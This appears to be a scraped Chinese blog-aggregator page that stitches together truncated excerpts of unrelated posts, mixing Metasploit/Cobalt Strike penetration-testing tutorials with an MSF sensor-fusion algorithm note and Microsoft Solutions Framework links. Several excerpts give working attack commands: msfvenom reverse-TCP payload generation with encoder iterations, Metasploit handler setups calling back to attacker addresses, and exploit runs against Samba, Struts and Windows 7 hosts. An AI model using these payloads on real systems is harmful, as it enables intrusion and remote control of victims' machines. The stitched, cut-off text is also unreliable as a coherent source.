msf

cobalt strike笔记-CS与MSF,Armitage,Empire互转shell

烈酒焚心 提交于 2019-11-29 14:42:14
0x01 Metasploit派生shell给Cobaltstrike 生成木马: msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.5.4 LPORT=4444 -f exe > test.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload Found 1 compatible encoders Attempting to encode payload with 5 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 368 (iteration=0) x86/shikata_ga_nai succeeded with size 395 (iteration=1) x86/shikata_ga_nai succeeded with size 422 (iteration=2) x86/shikata_ga_nai

Metaspolit工具----基础

冷暖自知 提交于 2019-11-29 03:26:25
Metasploit框架(Metasploit Framework,MSF)是一个开源工具,旨在方便渗透测试,他是有Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。几乎所有流行的操作系统都支持Metasploit框架而且Metasploit框架在这些操作系统上的工作流程基本都一样。 这里直接采用kali的,在使用kali操作系统是应注意及时更新源。更新命令有: apt-get update # 只更新软件包的索引源,作用是同步源的软件包的索引信息,从而进行软件更新。 apt-get upgrade # 升级系统上安装的所有软件包 apt-get dist-upgrade # 升级整个linux系统,如kali1.0.1升级到1.0.2. Metasplot专业术语: msf框架由多个模块组成,功能如下: Auxiliaries(辅助模块): 该模块不会直接在测试者和目标主机之间建立访问,他们只负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试。 Exploit(漏洞利用模块): 指攻击者利用一个系统、应用或者服务中的安全漏洞进行攻击。 Payload(攻击载荷模块): 攻击载荷是我们期望目标系统在渗透攻击之后完成实际攻击功能的代码。 Post(后期渗透模块): 主要用于在取得目标系统远程控制权后,进行的一系列的后渗透攻击动作

多传感器融合MSF算法源码阅读(三)

谁都会走 提交于 2019-11-28 13:22:13
文章目录 1.触发测量更新回调函数 2.测量更新状态量 无人驾驶算法学习(六):多传感器融合MSF算法 多传感器融合MSF算法源码阅读(一) 多传感器融合MSF算法源码阅读(二) 1.触发测量更新回调函数 查看PoseSensorHandler::MeasurementCallback回调函数。注意,在构造函数中挂载了三个不同的MeasurementCallback函数 2.测量更新状态量 来源: https://blog.csdn.net/orange_littlegirl/article/details/100065933

在vps上安装 kali linux

梦想与她 提交于 2019-11-28 06:02:05
在渗透测试过程中,很多时候我们需要反弹一个shell回来。使用empire也好,MSF也好,其他工具也好,都避不开公网IP的问题。这时候我们就需要一个VPS来进一步进行渗透测试。 建立通道连接的方式有很多种,比如NAT映射、ssh隧道等各种方式,这里我们就不探讨了。 建立通道的不稳定性很高,容易断开,对网络安全爱好者来说是一种莫大的折磨。而且可能由于种种原因,购买不到KVM架构的VPS,无法直接在VPS上安装kali linux等渗透测试系统。下面介绍了几种在debian系统下安装kali linux的方法。配合使用screen,或者tmux等工具非常好用 首先我们为我们的VPS安装Debian 8 几乎万能的方法—docker Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的 Linux 机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。 由于docker的运行环境中需要3.8+的内核,此方法不是特别适用,可使用uname -a来检查VPS的内核版本。比如小编的VPS厂商给出的镜像,内核版本只有2.6+。如果你的内核版本低于3.8,请略过该方法,往下看。 安装docker 在debian 8 下安装docker http://www.docker.org.cn/book/install

Microsoft Solutions Framework (MSF) 4.0 相关资源

做~自己de王妃 提交于 2019-11-27 04:40:52
1.相关下载 MSF for CMMI® Process Improvement(22.4 MB, 英文) http://www.microsoft.com/downloads/details.aspx?FamilyId=10B578F1-B7A4-459F-A783-04BC82CB2359&displaylang=en MSF for Agile Software Development Process Guidance(6.4 MB, 英文) http://www.microsoft.com/downloads/details.aspx?familyid=9F3EA426-C2B2-4264-BA0F-35A021D85234&displaylang=en 2.相关链接 MSF for CMMI® Process Improvement(在线简体中文资料) http://www.dotnettools.org/MSFFormal.htm MSF for Agile Software Development(在线简体中文资料) http://www.dotnettools.org/MSFAgile.htm MSF的主网站 http://msdn2.microsoft.com/en-us/teamsystem/aa718795.aspx Visual Studio Team

msf拿到shell之后的一条龙套餐

ぃ、小莉子 提交于 2019-11-26 09:25:49
生成ps 反弹脚本 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.123 lport=12345 -f psh-reflection>/tmp/search.ps1 msf 监听反弹 msf > use exploit/multi/handler msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.43.100 msf exploit(handler) > set LPORT 4444 msf exploit(handler) > set ExitOnSession false msf exploit(handler) > exploit -j -z [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.43.100:4444 以上是 如何 用msfvenom 生成木马,并且 msf 如何监听 木马运行之后 弹的shell。 包括昨天 用的 green-hat-suite_Pass 这个工具 已经凉了啊感觉 ......

metsploit魔鬼训练营第一章作业

我与影子孤独终老i 提交于 2019-11-26 09:24:14
实验一:通过攻击samba服务漏洞控制linux靶机 目标ip:192.168.232.134 metasploitable靶机下载地址:链接:http://pan.百度.com/s/1slHJcZV 密码:ndoj 实验环境:kali linux kali : msfconsole msf > use exploit/multi/samba/usermap_script msf exploit(usermap_script) > set payload cmd/unix/bind_netcat msf exploit(usermap_script) > show options Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 139 yes The target port Payload options (cmd/unix/bind_netcat) msf exploit(usermap_script) > set RHOST 192.168.232.134 RHOST => 192

Apache Struts Jakarta Multipart Parser OGNL Injection(Metasploit)复现失败

北城余情 提交于 2019-11-26 09:23:56
0x01:环境 PentestBox2.2 下载Exploit https://www.exploit-db.com/exploits/31433/ 加载到metasploit-framework.bak\modules\exploits\multi\http\struts 0x02: msf exploit( 41614 ) > use exploit/multi/http/struts/ 41614 msf exploit( 41614 ) > set payload windows/meterpreter/reverse_tcp msf exploit( 41614 ) > show options msf exploit( 41614 ) > set rhost 10.160 .11 .192 msf exploit( 41614 ) > set targeturi /struts2- 5 -showcase/ msf exploit( 41614 ) > set lhost 10.160 .14 .122 msf exploit( 41614 ) > show options msf exploit( 41614 ) > run [*] Started reverse TCP handler on 10.160 .14 .122 : 4444 [-] Exploit

kali渗透测试win7

半世苍凉 提交于 2019-11-26 09:23:26
通过msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=自己地址 lport=端口号 -f exe x>XX.exe 把木马传过去,点开就会往自己开放的ip和端口发送一个tcp链接 在kali中 msfconsole msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 172.16.4.3 #设置本地ip lhost => 172.16.4.3 msf exploit(multi/handler) > set lport 44444 #设置本地端口 lport => 44444 msf exploit(multi/handler) > exploit tcp链接以后可以使用以下功能 uictl开关键盘/鼠标 uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标 uictl disable mouse #禁用鼠标 uictl

Cobalt Strike使用教程二

落爺英雄遲暮 提交于 2019-11-26 09:23:16
0x00 前言 继 前一章 介绍了Cobalt Strike的基本用法,本章接着介绍如何攻击、提权、维权等。 0x01 与Metasploit联动 Cobalt Strike → Metasploit msf开启监听模式 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.183.147 set lport 4444 run -j 创建两个监听器,一个使用windows/beacon_http/reverse_http来监听肉鸡,另一个使用windows/foreign/reverse_http来将获取到的控制权传给msf(注意:这里的端口要与msf监听的端口一致) 利用HTML Application来生成链接,使得目标设备上线,右击选择spwan,选择msf监听器,点击Choose 返回msf查看,成功获取meterpreter会话(此方法获取到的会话并不稳定,具体原因未知) Metasploit→ Cobalt Strike 当然这里也可以通过用msfvenom生成木马,再由CS发布 msfvenom -p windows/meterpreter/reverse_tcp lhost = 192.168.183.147 lport = 4444 -f